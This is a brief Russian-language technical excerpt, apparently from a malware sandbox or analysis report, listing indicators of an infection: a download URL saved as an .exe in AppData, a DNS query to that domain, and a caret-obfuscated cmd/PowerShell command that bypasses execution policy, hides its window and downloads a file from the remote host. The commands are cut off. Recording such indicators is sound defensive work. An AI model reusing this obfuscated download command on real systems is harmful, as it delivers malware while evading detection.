Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pow^ER^S^He^lL.^eX^E -EX^EcUTi^on^p^O^Li^c^Y^ BY^PA^sS -^nOpR^OFIL^e -^wIN^doWS^TyL^e h^I^d^den (N^EW^-Obj^E^CT ^syStEm.Net^.WeBC^lI^ent).d^OwNLoAD^fILe(^'http://transporings...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /c "pow^ER^S^He^lL.^eX^E -EX^EcUTi^on^p^O^Li^c^Y^ BY^PA^sS -^nOpR^OFIL^e -^wIN^doWS^TyL^e h^I^d^den (N^EW^-Obj^E^CT ^syStEm.Net^.WeBC^lI^ent).d^OwNLoAD^fILe(^'http://transporings...' (со скрытым окном)